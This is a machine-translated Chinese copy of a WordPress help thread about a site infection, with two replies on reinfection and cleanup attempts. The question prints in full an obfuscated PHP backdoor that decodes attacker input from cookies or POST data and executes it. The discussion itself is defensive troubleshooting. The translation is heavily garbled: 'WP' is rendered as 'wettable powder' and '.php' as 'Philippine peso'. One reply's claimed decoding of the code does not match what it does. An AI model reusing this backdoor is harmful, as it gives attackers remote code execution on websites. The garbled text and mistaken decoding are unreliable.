如果这个恶意软件感染了你的可湿性粉剂,会有什么影响?

时间:2019-10-19 作者:jasaweb

我只是好奇,我需要更好地了解这个恶意软件。因为他们的are网站感染了此恶意软件,包括我的网站。但我可以把它们都洗干净。通常这种恶意软件在中以奇怪的名称编写。php文件,在此文件中:

<?php
$hsexdir = \'pmi9kl4H61gcbayrf_xsuo*-5#vden3t\\\'7\';$yiorkoj = Array();$yiorkoj[] = $hsexdir[11].$hsexdir[15].$hsexdir[28].$hsexdir[13].$hsexdir[31].$hsexdir[28].$hsexdir[17].$hsexdir[16].$hsexdir[20].$hsexdir[29].$hsexdir[11].$hsexdir[31].$hsexdir[2].$hsexdir[21].$hsexdir[29];$yiorkoj[] = $hsexdir[7].$hsexdir[22];$yiorkoj[] = $hsexdir[24].$hsexdir[27].$hsexdir[11].$hsexdir[6].$hsexdir[13].$hsexdir[13].$hsexdir[8].$hsexdir[24].$hsexdir[23].$hsexdir[3].$hsexdir[27].$hsexdir[24].$hsexdir[24].$hsexdir[23].$hsexdir[6].$hsexdir[16].$hsexdir[12].$hsexdir[24].$hsexdir[23].$hsexdir[13].$hsexdir[33].$hsexdir[11].$hsexdir[27].$hsexdir[23].$hsexdir[28].$hsexdir[28].$hsexdir[24].$hsexdir[8].$hsexdir[9].$hsexdir[27].$hsexdir[11].$hsexdir[30].$hsexdir[13].$hsexdir[27].$hsexdir[11].$hsexdir[28];$yiorkoj[] = $hsexdir[25];$yiorkoj[] = $hsexdir[11].$hsexdir[21].$hsexdir[20].$hsexdir[29].$hsexdir[31];$yiorkoj[] = $hsexdir[19].$hsexdir[31].$hsexdir[15].$hsexdir[17].$hsexdir[15].$hsexdir[28].$hsexdir[0].$hsexdir[28].$hsexdir[13].$hsexdir[31];$yiorkoj[] = $hsexdir[28].$hsexdir[18].$hsexdir[0].$hsexdir[5].$hsexdir[21].$hsexdir[27].$hsexdir[28];$yiorkoj[] = $hsexdir[19].$hsexdir[20].$hsexdir[12].$hsexdir[19].$hsexdir[31].$hsexdir[15];$yiorkoj[] = $hsexdir[13].$hsexdir[15].$hsexdir[15].$hsexdir[13].$hsexdir[14].$hsexdir[17].$hsexdir[1].$hsexdir[28].$hsexdir[15].$hsexdir[10].$hsexdir[28];$yiorkoj[] = $hsexdir[19].$hsexdir[31].$hsexdir[15].$hsexdir[5].$hsexdir[28].$hsexdir[29];$yiorkoj[] = $hsexdir[0].$hsexdir[13].$hsexdir[11].$hsexdir[4];foreach ($yiorkoj[8]($_COOKIE, $_POST) as $sgmcz => $tfbhhc){function ouvcux($yiorkoj, $sgmcz, $lcrwjj){return $yiorkoj[7]($yiorkoj[5]($sgmcz . $yiorkoj[2], ($lcrwjj / $yiorkoj[9]($sgmcz)) + 1), 0, $lcrwjj);}function jnlge($yiorkoj, $ysittw){return @$yiorkoj[10]($yiorkoj[1], $ysittw);}function njfgaru($yiorkoj, $ysittw){$epjvwf = $yiorkoj[4]($ysittw) % 3;if (!$epjvwf) {$oqkbtbd = $yiorkoj[0]; $qyzju = $oqkbtbd("", $ysittw[1]($ysittw[2]));$qyzju();exit();}}$tfbhhc = jnlge($yiorkoj, $tfbhhc);njfgaru($yiorkoj, $yiorkoj[6]($yiorkoj[3], $tfbhhc ^ ouvcux($yiorkoj, $sgmcz, $yiorkoj[9]($tfbhhc))));}
恶意软件创建了许多索引。文件夹中的php文件以及此恶意软件在索引中添加代码。php(real one),wp配置。php和wp设置。php。此恶意软件将受感染文件的文件权限更改为0755。在此索引内。php(原始和伪造)和那些原始WP文件中有一个加密的目标目录代码,用于其他恶意软件。ico(扩展名)或favicon文件。

可能专家可以解释更多。

2 个回复
SO网友:Rick Hellewell

我也在一个有几个WP安装的托管场所看到了这一点。清理它们(删除不应该存在的文件,删除代码)还没有解决问题,它会不断回来。

如果要解码这样的字符串,请使用https://www.unphp.net 地点使用递归检查按钮。

我在wp设置中发现错误代码。php,wp配置。php,索引。php、ico文件(以点开头使其隐藏)、随机名称。菲律宾比索,胭脂500。WP安装和非WP站点中的php文件。

不确定再次感染来自何处。到处都有重置凭据(托管、ftp、WP用户等),但都没有用。

我认为wp posts表中可能有一些代码。今天的任务是寻找答案。

对于您的代码,它(通过www.unphp.net网站)计算为:;其他受感染的文件具有相同的模糊代码评估:

<?php ?><div style="clear: both"></div>
</div>
<div id="foot">
<a href="<?php bloginfo(\'url\'); ?>">Home</a><?php $pages = wp_list_pages(\'depth=1&title_li=&echo=0\');
$pages2 = preg_split(\'/(<li[^>]*>)/\', $pages);
foreach ($pages2 as $var) {
    echo str_replace(\'</li>\', \'\', $var);
} ?> <br/>
Distributed by <a href="http://mondaydressing.com">Baju Grosiran</a><br/>
<?php wp_footer(); ?>
<?php $header_ads_act = get_theme_option(\'footer_ads_act1\');
if (($header_ads_act == \'\') || ($header_ads_act == \'No\')) { ?>
Copyright &#169; <?php echo date("Y") ?> <a href="<?php bloginfo(\'url\'); ?>"><?php bloginfo(\'name\'); ?></a><?php
} else { ?><?php echo get_theme_option(\'footer_ads1\'); ?><?php
} ?>
</div>
</div>
</body>
</html><?
仍在分析;当我发现更多时,会补充这个答案。

Added

前面有一个点的“ico”文件包含的PHP代码也计算为上述代码。有@include 修改后的文件中指向这些ico文件的命令,以便执行其中的代码。

Added 2019年10月19日太平洋标准时间下午630时

注意,有许多文件,大部分是索引文件。php,具有“执行”权限(755)。这是包含一些模糊代码(通过上面链接的站点解码)的文件的指示符。

一些解码的字符串将指向恶意软件的ICO文件。

但所有编码的字符串都解码为上述代码。

确实在一个WP站点中找到了几篇作者编号为“0”的草稿帖子。但还没有迹象表明恶意软件的入口点。

Added 2019年10月20日

仍然没有找到代码插入的源代码。我可以清理整个网站(我想),第二天文件会被重新攻击。

我做了所有标准的事情,但都没有用。

我正在建立一个程序,将扫描所有文件,并寻找可能已被黑客攻击的文件;也许我错过了一些。

具有多个站点(可湿性粉剂和非可湿性粉剂)的服务器(托管地点的专用VPS服务器)使问题变得更加复杂。所有网站都受到影响,所有文件夹中都随机放置了文件。

我会想出这个办法的。幸运的是,这些网站的流量很低。但进行“核试验”是不可行的。我会继续在这里报道。。。

Added 24 Oct 2019

我写了一个程序,帮助我根据内容识别可能被黑客攻击的文件。这不是一个真正的“反病毒”程序,而是一个很好的(IMHO)程序,用于确定关注的领域。

如果您(或任何其他人)感兴趣,请通过https://www.securitydawg.com 地点

Added 11 Nov 2019

网站仍在修改中。wp设置/wp配置文件,添加隐藏的ico文件、随机命名的php文件和修改的索引。php(包括不应该存在的index.php文件)。

完成的其他事项(除上述事项外):

更改wp配置的权限。php和wp设置。php设置为400或将WP数据库的密码更改为非常强的密码

SO网友:Emir Anon

我也有同样的问题,我在互联网上到处搜索如何解决它。从字面上看,50个谷歌结果就像这一个,没有人有一个解决方案,除了核武器的网站。为每个网站支付170美元或更多的费用来清理这个网站(如Sucuri、Astra等服务)实在是太多了,这将达到数千美元,因为我有30个网站,其中一些甚至不值得170美元。

我真的把这些擦干净了。ico文件每天早上都会手动创建,还有一些8个字母的php文件,如hgz8ag55。php完全随机,但始终为8个字母。如果我不这样做,它就会变得非常糟糕,重定向我的流量,插入帖子。。。

唯一有效的方法是在新的空白数据库上完全重新安装wordpress,然后删除表并导入旧数据库,然后尽快下载该数据库的干净备份并将其移动到新的干净服务器,因为否则它会再次受到影响。对于30个站点来说,这是一个非常困难的过程。到目前为止,我已经搬了5家。令人惊讶的是,整个互联网都无法解决这个问题:(

标签: hacked   小码农  

相关推荐

How was my WP site hacked

我的网站,http://www.cancer-study.com, 已被黑客攻击,我无法登录到wp管理员。你能说一下它是如何被黑客入侵的吗?我能做些什么来修复损坏?我可以访问主机。